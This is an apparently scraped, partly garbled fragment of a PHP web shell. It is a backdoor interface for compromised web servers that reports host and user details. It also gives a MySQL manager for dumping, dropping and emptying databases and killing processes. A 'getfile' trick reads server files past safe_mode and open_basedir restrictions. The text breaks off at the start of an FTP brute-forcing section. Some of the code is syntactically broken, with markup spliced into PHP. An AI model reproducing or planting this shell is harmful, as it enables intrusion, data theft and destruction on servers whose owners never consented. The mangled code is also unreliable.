# Contact : failed404@gmail.com </u></p> <table border=0 id="bordered">print "~ host ".$_SERVER['SERVER_NAME']."";print "~ server ".$_SERVER['SERVER_SOFTWARE']."";if (is_callable("php_uname")) print "~ os ".Linux Server 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC x86_64.""; if (is_callable("posix_getuid") and is_callable("posix_getgid")) { $uid=posix_getuid(); $uname=posix_getpwuid($uid); $uname=$uname['name']; $gid=posix_getgid(); $gname=posix_getgrgid($gid); $gname=$gname['name']; print "~ uid $uid ($uname)"; print "~ gid $gid ($gname)";} print "

";$mysql_on = @function_exists('mysql_connect');$mssql_on = @function_exists('mssql_connect');$pg_on = @function_exists('pg_connect');$ora_on = @function_exists('ocilogon');$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}$d = str_replace("\\\\","\\",$d);$dispd = htmlspecialchars($d);$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));$i = 0;/*foreach($pd as $b){ $t = ""; $j = 0; foreach ($e as $r) { $t.= $r.DIRECTORY_SEPARATOR; if ($j == $i) {break;} $j++; } echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\">".htmlspecialchars($b).DIRECTORY_SEPARATOR."</a>"; $i++;}*//*echo "&nbsp;&nbsp;&nbsp;";if (is_writable($d)){ $wd = TRUE; $wdt = "<font color=red>[ ok ]</font>"; echo "<font color=red>".view_perms(fileperms($d))."</font>";}else{ $wd = FALSE; $wdt = "<font color=red>[ Read-Only ]</font>"; echo "".view_perms_color($d)."";}*//*if (is_callable("disk_free_space")){ $free = disk_free_space($d); $total = disk_total_space($d); if ($free === FALSE) {$free = 0;} if ($total === FALSE) {$total = 0;} if ($free < 0) {$free = 0;} if ($total < 0) {$total = 0;} $used = $total-$free; $free_percent = round(100/($total/$free),2); echo "
Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)";}echo "
";echo "Your ip: <a href=http://".$_SERVER["REMOTE_ADDR"].">".$_SERVER["REMOTE_ADDR"]."</a> - Server ip: <a href=http://".gethostbyname($_SERVER["HTTP_HOST"]).">".gethostbyname($_SERVER["HTTP_HOST"])."</a><br/>";*//*$letters = "";if ($win){ $v = explode("\\",$d); $v = $v[0]; foreach (range("a","z") as $letter) { $bool = $isdiskette = in_array($letter,$safemode_diskettes); if (!$bool) {$bool = is_dir($letter.":\\");} if ($bool) { $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">[ "; if ($letter.":" != $v) {$letters .= $letter;} else {$letters .= "<font color=red>".$letter."</font>";} $letters .= " ]</a> "; } } if (!empty($letters)) {echo "Detected drives: ".$letters."
";}}*/echo ' <div align="center"><table width="100%" id="bordered"> ';if (count($quicklaunch) > 0){ foreach($quicklaunch as $item) { $item[1] = str_replace("%d",urlencode($d),$item[1]); $item[1] = str_replace("%sort",$sort,$item[1]); $v = realpath($d.".."); if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);} $item[1] = str_replace("%upd",urlencode($v),$item[1]); echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;"; }}echo "
";if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<table width=\"100%\" id=\"bordered\"> <td width=\"100%\" valign=\"top\">".$donated_html."
"; } echo "<table width=\"100%\" id=\"bordered\"> <td width=\"100%\" valign=\"top\">"; if ($act == "") {$act = $dspact = "ls";}if ($act == "sql"){ $sql_surl = $surl."act=sql"; if ($sql_login) {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);} if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);} if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);} if ($sql_port) {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);} if ($sql_db) {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);} $sql_surl .= "&"; <TABLE width="100%" id="bordered"> <td width="100%" height="1" colspan="2" valign="top">
if ($sql_server) { $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd); $err = mysql_smarterror(); @mysql_select_db($sql_db,$sql_sock); if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();} } else {$sql_sock = FALSE;} echo "SQL Manager:
"; if (!$sql_sock) { if (!$sql_server) {echo "NO CONNECTION";} else {echo "
Can't connect
"; echo "".$err."";} } else { $sqlquicklaunch = array(); $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"); $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)); $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus"); $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars"); $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes"); $sqlquicklaunch[] = array("Logout",$surl."act=sql"); echo "
MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")
"; if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}} echo "
"; } echo ""; if (!$sql_sock) {<td width="28%" height="100" valign="top">
<font size="5"><br/></font>
<li>If login is null, login is owner of process.<li>If host is null, host is localhost<li>If port is null, port is 3306 (default)<td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0>&nbsp;<td align=right>
} else { //Start left panel if (!empty($sql_db)) { <td width="25%" height="100%" valign="top"><a href=" echo $surl."w4/act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ">Home</a><hr size="1" noshade> $result = mysql_list_tables($sql_db); if (!$result) {echo mysql_smarterror();} else { echo "---[ <a href=\"".$sql_surl."&\">".htmlspecialchars($sql_db)."</a> ]---
"; $c = 0; while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "?nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\">".htmlspecialchars($row[0])."</a> (".$count_row[0].")
"; mysql_free_result($count); $c++;} if (!$c) {echo "No tables found in database.";} } } else { <td width="1" height="100" valign="top"><a href=" echo $sql_surl; ">Home</a><hr size="1" noshade> $result = mysql_list_dbs($sql_sock); if (!$result) {echo mysql_smarterror();} else {
<select name="sql_db"> $c = 0; $dbs = ""; while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;} echo "<option value=\"\">Databases (".$c.")</option>"; echo $dbs; } </select><hr size="1" noshade>Please, select database<hr size="1" noshade>
} //End left panel echo "<td width=\"100%\" height=\"1\" valign=\"top\">"; //Start center panel $diplay = TRUE; if ($sql_db) { if (!is_numeric($c)) {$c = 0;} if ($c == 0) {$c = "no";} echo "<hr size=\"1\" noshade>
There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").
"; if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}} echo "
"; $acts = array("","dump"); if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";} elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";} elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";} elseif ($sql_tbl_act == "insert") { if ($sql_tbl_insert_radio == 1) { $keys = ""; $akeys = array_keys($sql_tbl_insert); foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";} if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);} $values = ""; $i = 0; foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;} if (!empty($values)) {$values = substr($values,0,strlen($values)-2);} $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );"; $sql_act = "query"; $sql_tbl_act = "browse"; } elseif ($sql_tbl_insert_radio == 2) { $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs); $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;"; $result = mysql_query($sql_query) or print(mysql_smarterror()); $result = mysql_fetch_array($result, MYSQL_ASSOC); $sql_act = "query"; $sql_tbl_act = "browse"; } } if ($sql_act == "query") { echo "<hr size=\"1\" noshade>"; if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "Error:
";} if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\">
"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "

<textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea>

<input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\">
";} } if (in_array($sql_act,$acts)) { <table border="0" width="100%" height="1"> <td width="30%" height="1">Create a new table:
<td width="30%" height="1">Dump DataBase:
<td width="30%" height="1"><td width="30%" height="1"><td width="30%" height="1"><td width="30%" height="1"> if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";} if ($sql_act == "newtbl") { echo ""; if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!
"; } else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".
Reason: ".mysql_smarterror();} } elseif ($sql_act == "dump") { if (empty($submit)) { $diplay = FALSE; echo "
<input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\">SQL-Dump:

"; echo "DB:&nbsp;<input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\">

"; $v = join (";",$dmptbls); echo "Only tables (explode \";\")&nbsp;<sup>1</sup>:&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\">

"; if ($dump_file) {$tmp = $dump_file;} else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");} echo "File:&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\">

"; echo "Download: &nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked>

"; echo "Save to file: &nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>"; echo "

<input type=\"submit\" name=\"submit\" value=\"Dump\">

<sup>1</sup> - all, if empty"; echo "
"; } else { $diplay = TRUE; $set = array(); $set["sock"] = $sql_sock; $set["db"] = $sql_db; $dump_out = "download"; $set["print"] = 0; $set["nl2br"] = 0; $set[""] = 0; $set["file"] = $dump_file; $set["add_drop"] = TRUE; $set["onlytabs"] = array(); if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);} $ret = mysql_dump($set); if ($sql_dump_download) { @ob_clean(); header("Content-type: application/octet-stream"); header("Content-length: ".strlen($ret)); header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";"); echo $ret; exit; } elseif ($sql_dump_savetofile) { $fp = fopen($sql_dump_file,"w"); if (!$fp) {echo "Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";} else { fwrite($fp,$ret); fclose($fp); echo "Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")."; } } else {echo "Dump: nothing to do!";} } } if ($diplay) { if (!empty($sql_tbl)) { if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";} $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;"); $count_row = mysql_fetch_array($count); mysql_free_result($count); $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;"); $tbl_struct_fields = array(); while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;} if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;} if (empty($sql_tbl_page)) {$sql_tbl_page = 0;} if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;} if (empty($sql_tbl_le)) {$sql_tbl_le = 30;} $perpage = $sql_tbl_le - $sql_tbl_ls; if (!is_numeric($perpage)) {$perpage = 10;} $numpages = $count_row[0]/$perpage; $e = explode(" ",$sql_order); if (count($e) == 2) { if ($e[0] == "d") {$asc_desc = "DESC";} else {$asc_desc = "ASC";} $v = "ORDER BY `".$e[1]."` ".$asc_desc." "; } else {$v = "";} $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage.""; $result = mysql_query($query) or print(mysql_smarterror()); echo "<hr size=\"1\" noshade>
Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)
"; echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[&nbsp;Structure&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[&nbsp;Browse&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[&nbsp;Dump&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;Insert&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; if ($sql_tbl_act == "structure") {echo "

Coming sooon!";} if ($sql_tbl_act == "insert") { if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();} if (!empty($sql_tbl_insert_radio)) { } else { echo "

Inserting row into table:
"; if (!empty($sql_tbl_insert_q)) { $sql_query = "SELECT * FROM `".$sql_tbl."`"; $sql_query .= " WHERE".$sql_tbl_insert_q; $sql_query .= " LIMIT 1;"; $result = mysql_query($sql_query,$sql_sock) or print("

".mysql_smarterror()); $values = mysql_fetch_assoc($result); mysql_free_result($result); } else {$values = array();} echo "
<TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1>FieldTypeFunctionValue"; foreach ($tbl_struct_fields as $field) { $name = $field["Field"]; if (empty($sql_tbl_insert_q)) {$v = "";} echo "".htmlspecialchars($name)."".$field["Type"]."<select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50>"; $i++; } echo "
"; echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo ">Insert as new row"; if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked>Save"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";} echo "

<input type=\"submit\" value=\"Confirm\">
"; } } if ($sql_tbl_act == "browse") { $sql_tbl_ls = abs($sql_tbl_ls); $sql_tbl_le = abs($sql_tbl_le); echo "<hr size=\"1\" noshade>"; echo "[Pages]&nbsp;"; $b = 0; for($i=0;$i<$numpages;$i++) { if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";} echo $i; if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";} if (($i/30 == round($i/30)) and ($i > 0)) {echo "
";} else {echo "&nbsp;";} } if ($i == 0) {echo "empty";} echo "
<input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\">From:&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;To:&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\">
"; echo "
<TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1>"; echo ""; echo "<input type=\"checkbox\" name=\"boxrow_all\" value=\"1\">"; for ($i=0;$i<mysql_num_fields($result);$i++) { $v = mysql_field_name($result,$i); if ($e[0] == "a") {$s = "d"; $m = "asc";} else {$s = "a"; $m = "desc";} echo ""; if (empty($e[0])) {$e[0] = "a";} if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\">".$v."</a>";} else {echo "".$v."<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\">[sort]</a>";} echo ""; } echo "<font color=\"red\">Action</font>"; echo ""; while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) { echo ""; $w = ""; $i = 0; foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;} if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);} echo "<input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\">"; $i = 0; foreach ($row as $k=>$v) { $v = htmlspecialchars($v); if ($v == "") {$v = "<font color=\"red\">NULL</font>";} echo "".$v.""; $i++; } echo ""; echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\">[Delete]</a>&nbsp;"; echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\">[Edit]</a>&nbsp;"; echo ""; echo ""; } mysql_free_result($result); echo "<hr size=\"1\" noshade><p align=\"left\"><select name=\"sql_act\">"; echo "<option value=\"\">With selected:</option>"; echo "<option value=\"deleterow\">Delete</option>"; echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\">
</p>"; } } else { $result = mysql_query("SHOW TABLE STATUS", $sql_sock); if (!$result) {echo mysql_smarterror();} else { echo "
<TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\">
RowsTypeCreatedModifiedSizeAction"; $i = 0; $tsize = $trows = 0; while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) { $tsize += $row["Data_length"]; $trows += $row["Rows"]; $size = view_size($row["Data_length"]); echo ""; echo "<input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\">"; echo "&nbsp;<a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\">".$row["Name"]."</a>&nbsp;"; echo "".$row["Rows"].""; echo "".$row["Type"].""; echo "".$row["Create_time"].""; echo "".$row["Update_time"].""; echo "".$size.""; echo "&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\">[Empty]</a>&nbsp;&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\">[Drop]</a>&nbsp;<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\">[Insert]</a>&nbsp;"; echo ""; $i++; } echo "<tr bgcolor=\"000000\">"; echo "
"; echo "
".$i." table(s)
"; echo "".$trows.""; echo "".$row[1].""; echo "".$row[10].""; echo "".$row[11].""; echo "".view_size($tsize).""; echo ""; echo ""; echo "<hr size=\"1\" noshade><p align=\"right\"><select name=\"sql_act\">"; echo "<option value=\"\">With selected:</option>"; echo "<option value=\"tbldrop\">Drop</option>"; echo "<option value=\"tblempty\">Empty</option>"; echo "<option value=\"tbldump\">Dump</option>"; echo "<option value=\"tblcheck\">Check table</option>"; echo "<option value=\"tbloptimize\">Optimize table</option>"; echo "<option value=\"tblrepair\">Repair table</option>"; echo "<option value=\"tblanalyze\">Analyze table</option>"; echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></p>"; mysql_free_result($result); } } } } } else { $acts = array("","newdb","serverstatus","servervars","processes","getfile"); if (in_array($sql_act,$acts)) {<table border="0" width="100%" height="1"><td width="30%" height="1">Create new DataBase:
<td width="30%" height="1">View File:
<td width="30%" height="1"><td width="30%" height="1"><td width="30%" height="1"><td width="30%" height="1"> } if (!empty($sql_act)) { echo "<hr size=\"1\" noshade>"; if ($sql_act == "newdb") { echo ""; if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!
";} else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".
".mysql_smarterror();} } if ($sql_act == "serverstatus") { $result = mysql_query("SHOW STATUS", $sql_sock); echo "
Server-status variables:

"; echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1>NameValue"; while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "".$row[0]."".$row[1]."";} echo "
"; mysql_free_result($result); } if ($sql_act == "servervars") { $result = mysql_query("SHOW VARIABLES", $sql_sock); echo "
Server variables:

"; echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1>NameValue"; while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "".$row[0]."".$row[1]."";} echo ""; mysql_free_result($result); } if ($sql_act == "processes") { if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "Killing process #".$kill."... ok. he is dead, amen.";} $result = mysql_query("SHOW PROCESSLIST", $sql_sock); echo "

"; echo "<TABLE width=100% id=bordered>IDUSERHOSTDBCOMMANDTIMESTATEINFOAction"; while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "".$row[0]."".$row[1]."".$row[2]."".$row[3]."".$row[4]."".$row[5]."".$row[6]."".$row[7]."<a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a>";} echo ""; mysql_free_result($result); } if ($sql_act == "getfile") { $tmpdb = $sql_login."_tmpdb"; $select = mysql_select_db($tmpdb); if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;} if ($select) { $created = FALSE; mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );"); mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); $result = mysql_query("SELECT * FROM tmp_file;"); if (!$result) {echo "Error in reading file (permision denied)!";} else { for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);} $f = ""; while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);} if (empty($f)) {echo "File \"".$sql_getfile."\" does not exists or empty!
";} else {echo "File \"".$sql_getfile."\":
";} mysql_free_result($result); mysql_query("DROP TABLE tmp_file;"); } } mysql_drop_db($tmpdb); //comment it if you want to leave database } } } } echo ""; if ($sql_sock) { $affected = @mysql_affected_rows($sql_sock); if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;} echo "
Affected rows: ".$affected."
"; } echo "";}if ($act == "mkdir"){ if ($mkdir != $d) { if (file_exists($mkdir)) {echo "Make Dir \"".htmlspecialchars($mkdir)."\": object alredy exists";} elseif (!mkdir($mkdir)) {echo "Make Dir \"".htmlspecialchars($mkdir)."\": access denied";} echo "

"; } $act = $dspact = "ls";}if ($act == "ftpquickbrute"){ echo "FTP Brute Forcer:
"; if (!win) {echo "This functions not work in Windows!

